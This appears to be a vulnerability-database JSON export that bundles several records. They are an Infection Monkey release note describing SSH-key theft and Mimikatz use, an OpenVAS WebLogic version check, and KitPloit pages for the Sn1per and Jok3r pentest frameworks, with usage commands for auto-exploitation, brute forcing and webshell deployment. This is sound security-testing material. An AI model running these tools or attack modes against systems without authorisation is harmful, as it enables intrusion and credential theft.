The monkey will now steal accessible SSH keys and use them when connecting to SSH servers, PR [#138](<https://github.com/guardicore/monkey/pull/138>).\n * Implement a cross platform attack for [Struts2 Multi-part file upload vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-045>), PR [#179](<https://github.com/guardicore/monkey/pull/179>).\n * Implement a cross platform attack for Oracle Web Logic CVE-2017-10271, PR [#180](<https://github.com/guardicore/monkey/pull/180>).\n * ElasticGroovy attack now supports Windows victims, PR [#181](<https://github.com/guardicore/monkey/pull/181>).\n * Hadoop cluster RCE - Abuse unauthenticated access to YARN resource manager, PR [#182](<https://github.com/guardicore/monkey/pull/182>).\n\n**Code improvements:**\n\n * We've refactored the codebase, so now it's easier to share code between the Monkey and the Monkey Island components. PR [#145](<https://github.com/guardicore/monkey/pull/145>).\n * Mimikatz is now bundled into a password protected ZIP file and extracted only if required. Makes deployment easier with AV software. PR [#169](<https://github.com/guardicore/monkey/pull/169>).\n * Monkey Island now properly logs itself to a file and console. So if you got bugs, it'll now be easier to figure them out. PR [#139](<https://github.com/guardicore/monkey/pull/139>).\n * Systemd permissions are now properly locked down\n * Fixed a situation where a successful shellshock attack could freeze the attacking Monkey. [#200](<https://github.com/guardicore/monkey/pull/200>)\n\nIn other words, the Monkey can now detect potential attack paths between computers within the same domain or workgroup using credentials reuse, pass-the-hash technique and cached logins. 
In addition to the already existing attacks, Infection Monkey 1.6.1 now includes support for the Struts2 Multipart file upload vulnerability (CVE-2017-5638), Oracle WebLogic Server WLS Security component vulnerability (CVE-2017-10271), Elasticsearch Groovy attack (CVE 2015-1427) & the Hadoop YARN Resource Manager remote code execution vulnerability.\n\nLot's of exciting stuff from the guys at Guardicore Labs. Really good work!\n\n## Download Infection Monkey 1.6.1:\n\nThe following Infection Monkey 1.6.1 files are available for download:\n\n 1. infection_monkey_1.6.1_AWS_only.zip\n 2. infection_monkey_1.6.1_AWS_only.tar.gz\n\nGet them **[here](<https://github.com/guardicore/monkey/releases/tag/infection_monkey_1.6.1_AWS_only>)**.\n\nThe post [UPDATE: Infection Monkey 1.6.1](<http://pentestit.com/update-infection-monkey-1-6-1/>) appeared first on [PenTestIT](<http://pentestit.com>).", "modified": "2018-12-03T22:28:53", "published": "2018-12-03T22:28:53", "id": "PENTESTIT:F5DFB26B34C75683830E664CBD58178F", "href": "http://pentestit.com/update-infection-monkey-1-6-1/", "type": "pentestit", "title": "UPDATE: Infection Monkey 1.6.1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-04-29T22:08:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-10063", "CVE-2017-10147", "CVE-2013-2027", "CVE-2017-10123", "CVE-2017-10334", "CVE-2017-5638", "CVE-2017-10152", "CVE-2017-10271", "CVE-2017-10352", "CVE-2017-10178", "CVE-2017-10148", "CVE-2017-10137", "CVE-2017-10336"], "description": "Oracle WebLogic Server is prone to multiple vulnerabilities.", "modified": "2020-04-27T00:00:00", "published": "2017-07-19T00:00:00", "id": "OPENVAS:1361412562310811244", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811244", "type": "openvas", "title": "Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811244\");\n script_version(\"2020-04-27T04:21:52+0000\");\n script_cve_id(\"CVE-2017-10137\", \"CVE-2017-5638\", \"CVE-2017-10147\", \"CVE-2017-10178\", \"CVE-2013-2027\",\n \"CVE-2017-10148\", \"CVE-2017-10063\", \"CVE-2017-10123\", \"CVE-2017-10352\", \"CVE-2017-10271\",\n \"CVE-2017-10152\", \"CVE-2017-10336\", \"CVE-2017-10334\");\n script_bugtraq_id(96729, 99651, 99644, 78027, 99652, 99653, 101304, 101392);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 04:21:52 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-19 12:53:23 +0530 (Wed, 19 Jul 2017)\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n 
script_name(\"Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to some unspecified errors in the\n 'Sample apps (Struts 2)', 'Core Components', 'Web Container', 'WLST'\n 'Web Services', 'WLS-WebServices' and 'WLS Security' components of application.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to have an impact on confidentiality, integrity and availability.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server versions 10.3.6.0, 12.1.3.0, 12.2.1.1 and 12.2.1.2.\");\n\n script_tag(name:\"solution\", value:\"See the referenced advisories for a solution.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!version = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\naffected = make_list('10.3.6.0.0', '12.1.3.0.0', '12.2.1.2.0', '12.2.1.1.0');\n\nforeach af (affected) {\n if( version == af) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"See advisory\");\n security_message(data:report, port:0);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2020-12-08T17:25:08", "bulletinFamily": "tools", "cvelist": ["CVE-2017-7269", "CVE-2018-7600", "CVE-2006-3392", "CVE-2009-3843", "CVE-2018-10561", "CVE-2017-5638", "CVE-2017-10271", "CVE-2018-11776", "CVE-2014-0160", "CVE-2017-9805", "CVE-2015-8249", "CVE-2014-6271", "CVE-2017-12617"], "description": "[  ](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . 
\n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n** Detailed host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n** NMap HTML host reports ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n** Takeovers and Email Security ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n** HTML5 Notepad ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n** ORDER SN1PER PROFESSIONAL: ** \nTo obtain a Sn1per Professional license, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n \n** DEMO VIDEO: ** \n \n \n\n\n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.) 
\n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** EXPLOITS: ** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003 \n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts \n * Drupal: CVE-2018-7600: [ Remote Code Execution ](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002 \n * GPON Routers - Authentication Bypass / [ Command Injection ](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561 \n * MS17-010 EternalBlue 
SMB Remote Windows Kernel Pool Corruption \n * Apache Tomcat: Remote Code Execution (CVE-2017-12617) \n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271 \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805) \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269 \n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249 \n * Shellshock Bash Shell remote code execution CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) \n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843 \n * MS08-067 Microsoft Server Service Relative Path Stack Corruption \n * Webmin File Disclosure CVE-2006-3392 \n * VsFTPd 2.3.4 Backdoor \n * ProFTPd 1.3.3C Backdoor \n * MS03-026 Microsoft RPC DCOM Interface Overflow \n * DistCC Daemon Command Execution \n * JBoss Java De-Serialization \n * HTTP Writable Path PUT/DELETE File Access \n * Apache Tomcat User Enumeration \n * Tomcat Application Manager Login Bruteforce \n * Jenkins-CI Enumeration \n * HTTP WebDAV Scanner \n * Android Insecure ADB \n * Anonymous FTP Access \n * PHPMyAdmin Backdoor \n * PHPMyAdmin Auth Bypass \n * OpenSSH User Enumeration \n * LibSSH Auth Bypass \n * SMTP User Enumeration \n * Public NFS Mounts \n \n** KALI LINUX INSTALL: ** \n\n \n \n bash install.sh\n\n \n** UBUNTU/DEBIAN/PARROT INSTALL: ** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n** DOCKER INSTALL: ** \n\n \n \n docker build Dockerfile\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly 
-b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive 
checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** FLYOVER: ** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly). \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** WEBSCAN: ** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni. 
\n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \"https://gist.github.com/1N3/8214ec2da2c91691bcbc\" ) \n \n \n\n\n** [ Download Sn1per ](<https://github.com/1N3/Sn1per> \"Download Sn1per\" ) **\n", "edition": 26, "modified": "2019-05-12T13:09:05", "published": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-08T23:27:41", "bulletinFamily": "tools", "cvelist": ["CVE-2017-9798", "CVE-2018-2893", "CVE-2012-1675", "CVE-2011-1720", "CVE-2017-7494", "CVE-2017-3248", "CVE-2017-5638", "CVE-2017-10271", "CVE-2018-11776", "CVE-2010-4344", "CVE-2017-9805", "CVE-2014-6271", "CVE-2015-0240", "CVE-2016-8735", "CVE-2017-12617", "CVE-2011-1764", "CVE-2012-2122", "CVE-2015-4852"], "description": "[  ](<https://2.bp.blogspot.com/-b-yEHDNsbTk/XEN8U7E8E2I/AAAAAAAAN8A/cGC9Z8NjoSUkGMyEFR9xJYU2XISstK8EgCLcBGAs/s1600/jok3r_1_logo.png>)\n\n \n_ Jok3r _ is a Python3 CLI application which is aimed at ** helping penetration testers for network infrastructure and web black-box security tests ** . \nIts main goal is to ** save time on everything that can be automated during network/web pentest in order to enjoy more time on more interesting and challenging stuff ** . \nTo achieve that, it ** combines open-source Hacking tools to run various security checks against all common network services. ** \n** \n** [ ](<https://draft.blogger.com/null>) \n** Main features ** \n** Toolbox management ** : \n\n\n * Install automatically all the hacking tools used by _ Jok3r _ , \n * Keep the toolbox up-to-date, \n * Easily add new tools. 
\n** Attack automation ** : \n\n\n * Target most common network services (including web), \n * Run security checks by chaining hacking tools, following standard process (Reconaissance, Vulnerability scanning, Exploitation, Account bruteforce, (Basic) Post-exploitation). \n * Let _ Jok3r _ automatically choose the checks to run according to the context and knowledge about the target, \n** Mission management / Local database ** : \n\n\n * Organize targets by missions in local database, \n * Fully manage missions and targets (hosts/services) via interactive shell (like msfconsole db), \n * Access results from security checks. \n_ Jok3r _ has been built with the ambition to be easily and quickly customizable: Tools, security checks, supported network services... can be easily added/edited/removed by editing settings files with an easy-to-understand syntax. \n \n[ ](<https://draft.blogger.com/null>) \n** Installation ** \n** The recommended way to use Jok3r is inside a Docker container so you will not have to worry about dependencies issues and installing the various hacking tools of the toolbox. ** \n \nA Docker image is available on Docker Hub and automatically re-built at each update: [ https://hub.docker.com/r/koutto/jok3r/ ](<https://hub.docker.com/r/koutto/jok3r/>) . It is initially based on official Kali Linux Docker image (kalilinux/kali-linux-docker). \n \n** Pull Jok3r Docker Image: ** \n\n \n \n sudo docker pull koutto/jok3r\n\n** Run fresh Docker container: ** \n\n \n \n sudo docker run -i -t --name jok3r-container -w /root/jok3r --net=host koutto/jok3r\n\n** Important: --net=host option is required to share host's interface. It is needed for reverse connections (e.g. Ping to container when testing for RCE, Get a reverse shell) ** \nJok3r and its toolbox is ready-to-use ! 
\n\n\n * To re-run a stopped container: \n \n \n sudo docker start -i jok3r-container\n\n * To open multiple shells inside the container: \n \n \n sudo docker exec -it jok3r-container bash\n\nFor information about building your own Docker image or installing _ Jok3r _ on your system without using Docker, refer to [ https://jok3r.readthedocs.io/en/latest/installation.html ](<https://jok3r.readthedocs.io/en/latest/installation.html>) \n \n[ ](<https://draft.blogger.com/null>) \n** Quick usage examples ** \n** Show all the tools in the toolbox ** \n\n \n \n python3 jok3r.py toolbox --show-all\n\n** Install all the tools in the toolbox ** \n\n \n \n python3 jok3r.py toolbox --install-all --fast\n\n** Update all the tools in the toolbox ** \n\n \n \n python3 jok3r.py toolbox --update-all --fast\n\n** List supported services ** \n\n \n \n python3 jok3r.py info --services\n\n** Show security checks for HTTP ** \n\n \n \n python3 jok3r.py info --checks http\n\n** Create a new mission in local database ** \n\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission -a MayhemProject\n \n [+] Mission \"MayhemProject\" successfully added\n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]>\n\n** Run security checks against an URL and add results to the mission ** \n\n \n \n python3 jok3r.py attack -t https://www.example.com/webapp/ --add MayhemProject\n\n** Run security checks against a MSSQL service (without user-interaction) and add results to the mission ** \n\n \n \n python3 jok3r.py attack -t 192.168.1.42:1433 -s mssql --add MayhemProject --fast\n\n** Import hosts/services from Nmap results into the mission scope ** \n\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission MayhemProject\n \n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]> nmap results.xml\n\n** Run security checks against all services in the given mission and store results in the database ** \n\n \n \n python3 jok3r.py attack -m MayhemProject --fast\n\n** 
Run security checks against only FTP services running on ports 21/tcp and 2121/tcp from the mission ** \n\n \n \n python3 jok3r.py attack -m MayhemProject -f \"port=21,2121;service=ftp\" --fast\n\n** Run security checks against only FTP services running on ports 2121/tcp and all HTTP services on 192.168.1.42 from the mission ** \n\n \n \n python3 jok3r.py attack -m MayhemProject -f \"port=2121;service=ftp\" -f \"ip=192.168.1.42;service=http\"\n\n[ ](<https://draft.blogger.com/null>) \n \n** Typical usage example ** \nYou begin a pentest with several servers in the scope. Here is a typical example of usage of _ JoK3r _ : \n\n\n 1. You run _ Nmap _ scan on the servers in the scope. \n 2. You create a new mission (let's say \"MayhemProject\") in the local database: \n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission -a MayhemProject\n \n [+] Mission \"MayhemProject\" successfully added\n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]>\n\n 3. You import your results from _ Nmap _ scan in the database: \n \n \n jok3rdb[MayhemProject]> nmap results.xml\n\n 4. You can then have a quick overview of all services and hosts in the scope, add some comments, add some credentials if you already have some knowledge about the targets (grey box pentest), and so on \n \n \n jok3rdb[MayhemProject]> hosts\n \n [...]\n \n jok3rdb[MayhemProject]> services\n \n [...]\n\n 5. Now, you can run security checks against some targets in the scope. For example, if you want to run checks against all Java-RMI services in the scope, you can run the following command: \n \n \n python3 jok3r.py attack -m MayhemProject -f \"service=java-rmi\" --fast\n\n 6. 
You can view the results from the security checks either in live when the tools are executed or later from the database using the following command: \n \n \n jok3rdb[MayhemProject]> results\n\n[ ](<https://draft.blogger.com/null>) \n \n** Full Documentation ** \nDocumentation is available at: [ https://jok3r.readthedocs.io/ ](<https://jok3r.readthedocs.io/>) \n \n[ ](<https://draft.blogger.com/null>) \n** Supported Services & Security Checks ** \n** Lots of checks remain to be implemented and services must be added !! Work in progress ... ** \n\n\n * [ AJP (default 8009/tcp) ](<https://github.com/koutto/jok3r#ajp-default-8009-tcp>)\n * [ FTP (default 21/tcp) ](<https://github.com/koutto/jok3r#ftp-default-21-tcp>)\n * [ HTTP (default 80/tcp) ](<https://github.com/koutto/jok3r#http-default-80-tcp>)\n * [ Java-RMI (default 1099/tcp) ](<https://github.com/koutto/jok3r#java-rmi-default-1099-tcp>)\n * [ JDWP (default 9000/tcp) ](<https://github.com/koutto/jok3r#jdwp-default-9000-tcp>)\n * [ MSSQL (default 1433/tcp) ](<https://github.com/koutto/jok3r#mssql-default-1433-tcp>)\n * [ MySQL (default 3306/tcp) ](<https://github.com/koutto/jok3r#mysql-default-3306-tcp>)\n * [ Oracle (default 1521/tcp) ](<https://github.com/koutto/jok3r#oracle-default-1521-tcp>)\n * [ PostgreSQL (default 5432/tcp) ](<https://github.com/koutto/jok3r#postgresql-default-5432-tcp>)\n * [ RDP (default 3389/tcp) ](<https://github.com/koutto/jok3r#rdp-default-3389-tcp>)\n * [ SMB (default 445/tcp) ](<https://github.com/koutto/jok3r#smb-default-445-tcp>)\n * [ SMTP (default 25/tcp) ](<https://github.com/koutto/jok3r#smtp-default-25-tcp>)\n * [ SNMP (default 161/udp) ](<https://github.com/koutto/jok3r#snmp-default-161-udp>)\n * [ SSH (default 22/tcp) ](<https://github.com/koutto/jok3r#ssh-default-22-tcp>)\n * [ Telnet (default 21/tcp) ](<https://github.com/koutto/jok3r#telnet-default-21-tcp>)\n * [ VNC (default 5900/tcp) ](<https://github.com/koutto/jok3r#vnc-default-5900-tcp>)\n\n \n\n\n[ 
](<https://draft.blogger.com/null>) \n** AJP (default 8009/tcp) ** \n\n \n \n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap AJP scripts | nmap |\n | tomcat-version | recon | Fingerprint Tomcat version through AJP | ajpy |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | default-creds-tomcat | bruteforce | Check [default credentials](<https://www.kitploit.com/search/label/Default%20Credentials>) for Tomcat Application Manager | ajpy |\n | deploy-webshell-tomcat | exploit | Deploy a webshell on Tomcat through AJP | ajpy |\n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n[ ](<https://draft.blogger.com/null>) \n** FTP (default 21/tcp) ** \n\n \n \n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap FTP scripts | nmap |\n | nmap-vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) 
| vuln-databases |\n | ftpmap-scan | vulnscan | Identify FTP server soft/version and check for known vulns | ftpmap |\n | common-creds | bruteforce | Check common credentials on FTP server | patator |\n | bruteforce-creds | bruteforce | Bruteforce FTP accounts | patator |\n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n[ ](<https://draft.blogger.com/null>) \n** HTTP (default 80/tcp) ** \n\n \n \n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n | Name | Category | Description | Tool used |\n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n | nmap-recon | recon | Recon using Nmap HTTP scripts | nmap |\n | load-balancing-detection | recon | HTTP load balancer detection | halberd |\n | waf-detection | recon | Identify and fingerprint WAF products protecting website | wafw00f |\n | tls-probing | recon | Identify the implementation in use by SSL/TLS servers (might allow server fingerprinting) | tls-prober |\n | fingerprinting-multi-whatweb | recon | Identify CMS, blogging platforms, JS libraries, Web servers | whatweb |\n | fingerprinting-app-server | recon | Fingerprint application server (JBoss, ColdFusion, Weblogic, Tomcat, Railo, Axis2, Glassfish) | clusterd |\n | fingerprinting-server-domino | recon | Fingerprint IBM/Lotus Domino server | domiowned |\n | fingerprinting-cms-wig | recon | Identify several CMS and other administrative applications | wig |\n | fingerprinting-cms-cmseek | recon | Detect CMS (130+ supported), detect version on Drupal, advanced scan on Wordpress/Joomla | cmseek |\n | fingerprinting-cms-fingerprinter | recon | Fingerprint precisely CMS versions (based on files 
